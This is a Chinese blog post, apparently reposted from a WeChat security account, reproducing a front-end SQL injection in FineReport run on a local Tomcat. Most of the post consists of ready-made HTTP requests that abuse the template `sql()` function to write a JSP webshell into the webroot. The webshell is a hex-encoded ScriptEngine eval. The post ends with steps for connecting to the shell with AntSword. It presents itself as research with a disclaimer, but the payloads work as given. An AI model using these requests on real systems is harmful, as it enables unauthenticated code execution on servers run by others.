2024年7月30日08:58:12评论71 views字数 2225阅读7分25秒阅读模式

环境搭建

从官网上下载环境

https://www.finereport.com/product/download/redirect?version=windows_x64_10.0&token=ydxWtxnCPbX3

帆软报表最新前台SQL漏洞复现

安装好后，将webapps目录中 webroot目录 的复制到 tomcat3 中的webapps目录中

接着启动运行 tomcat

帆软报表最新前台SQL漏洞复现

接着运行 apache-tomcat-8.5.87binstartup.bat 就成功搭建环境了

第一次运行先访问 http://127.0.0.1:8080/webroot/decision 要设置密码，默认内置和外置数据库

帆软报表最新前台SQL漏洞复现

本地测试报错

帆软报表最新前台SQL漏洞复现

配置tomcat server.xml 添加 relaxedQueryChars="[]|{}^\`"<>"

帆软报表最新前台SQL漏洞复现

GET /webroot/decision/view/ReportServer?test=&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fasd1.jsp%27%20as%20asd1%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20asd1.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20asd1.exp2%28data%29%20VALUES%20%28%27123%27%29%3B'),1,1)} HTTP/1.1
Host: 127.0.0.1:8080

帆软报表最新前台SQL漏洞复现

本地测试写webshell

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('•ATTACH DATABASE '../webapps/webroot/aaa.jsp' as gggggg;'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('•CREATE TABLE gggggg.exp2(data text);'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('•INSERT INTO gggggg.exp2(data) VALUES (x'247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d');'),1,1)}

帆软报表最新前台SQL漏洞复现

GET /webroot/decision/view/ReportServer?test=&n=/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fhelp.jsp%27%20as%20teeeee%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20teeeee.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20teeeee.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: 127.0.0.1:8080

帆软报表最新前台SQL漏洞复现

蚁剑进行连接，添加get参数?a=javax.script.ScriptEngineManager，蚁剑连接密码为b，连接类型选择JSPJS

帆软报表最新前台SQL漏洞复现

参考

https://y4tacker.github.io/2024/07/23/year/2024/7/%E6%9F%90%E8%BD%AFReport%E9%AB%98%E7%89%88%E6%9C%AC%E4%B8%AD%E5%88%A9%E7%94%A8%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%86%E8%8A%82/
https://mp.weixin.qq.com/s/AliftiLevjz5HB9uL0DOqQ

原文始发于微信公众号（安全逐梦人）：帆软报表最新前台SQL漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

帆软报表最新前台SQL漏洞复现

环境搭建

本地测试报错

本地测试写webshell

参考

漏洞复现 || Vite import存在任意文件读取漏洞

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

发表评论

在线咨询

微信